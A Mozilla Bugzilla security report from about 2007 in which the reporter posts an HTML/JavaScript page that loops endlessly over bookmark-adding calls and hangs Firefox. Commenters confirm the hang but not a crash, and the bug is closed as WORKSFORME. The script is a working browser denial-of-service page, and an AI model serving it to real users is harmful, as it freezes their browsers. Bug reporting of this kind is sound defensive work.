Closed
Bug 367543
Opened 18 years ago
Closed 18 years ago
Firefox crashs at this bad script
Categories
(Firefox :: Security, defect)
Tracking
()
VERIFIED
WORKSFORME
People
(Reporter: patrick.matthaei, Unassigned)
References
()
Details
User-Agent: Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)
Hi,
I discovered a little exploit for Firefox 1.5.0.9, 2.0, 2.0.0.1 and Iceweasel 2.0.0.1.
If someone opens this URL, Firefox loads himself into his death, until I kill FF.
Here's the sourcecode for this exploit:
<html>
<title>bug or not?</Title>
<body>
<script language="JavaScript1.2" type="text/javascript">
function MainPageBookmark() {title="google"; url="http://www.google.de/";
if (window.sidebar) { window.sidebar.addPanel(title, url,"");} else if( window.external )
{ window.external.AddFavorite( url, title); } else if(window.opera && window.print) { return true; }}
for (k=0;k<k+1;k++) MainPageBookmark();
</script>
</body>
Reproducible: Always
Steps to Reproduce:
1.Just open the URL where the exploit is.
Actual Results:
Just open the URL where the exploit is.
There's no talkback crash id available.
|
||
Comment 1•18 years ago
|
||
I get an endless stream of "add bookmark" dialogs, but no crash. (Mac trunk)
|
Reporter | |
Comment 2•18 years ago
|
||
I get this error at the konqueror browser, hm, but it's a bug :)
|
||
Updated•18 years ago
|
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 18 years ago
Resolution: --- → WORKSFORME
|
||
Comment 3•18 years ago
|
||
I get an ever increasing number of DOMWINDOWS in 1.8.0, 1.8.1, 1.9.0 debug builds on FC6 but no dialogs. It certains qualifies as a hang (dupe of Bug 301424) for me but not a crash.
Status: RESOLVED → VERIFIED
You need to log in
before you can comment on or make changes to this bug.
Description
•